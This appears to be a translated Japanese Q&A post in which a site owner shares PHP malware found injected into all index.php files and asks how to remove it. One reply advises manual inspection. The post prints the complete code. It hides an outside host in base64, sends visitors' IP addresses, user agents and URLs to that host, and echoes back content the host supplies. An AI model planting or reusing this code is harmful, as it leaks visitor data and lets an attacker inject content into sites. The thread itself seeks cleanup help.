0

これは私のサイトに常駐するマルウェアで、非常に悪質です。

<?php    
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&   (strstr($sUserAgent, 'bot') == false)) // Bot comes
{
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
$stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink ); 
}
} 
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle); 
if ($sResult[0]=="O") 
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle); 
}
?>

これは私のサーバー上のすべてのindex.phpファイルで修正されました.sshまたはcentosのリモートですべてのindex.phpページをクリーンアップしたいのですが、単純なphpコードと正規表現(多分)で可能だと思います.これが必要です.スクリプト [英語が苦手でごめんなさい]

本当にありがとう

4

1 に答える 1

1

200以上のファイルを処理している場合を除いて、各ファイルを個別に調べてマルウェアを駆除する方がはるかに優れています。これは、各ファイルを視覚的に検査できるようにするためです。

(編集:つまり、実際にマルウェアである場合。)

于 2011-09-06T21:44:51.593 に答える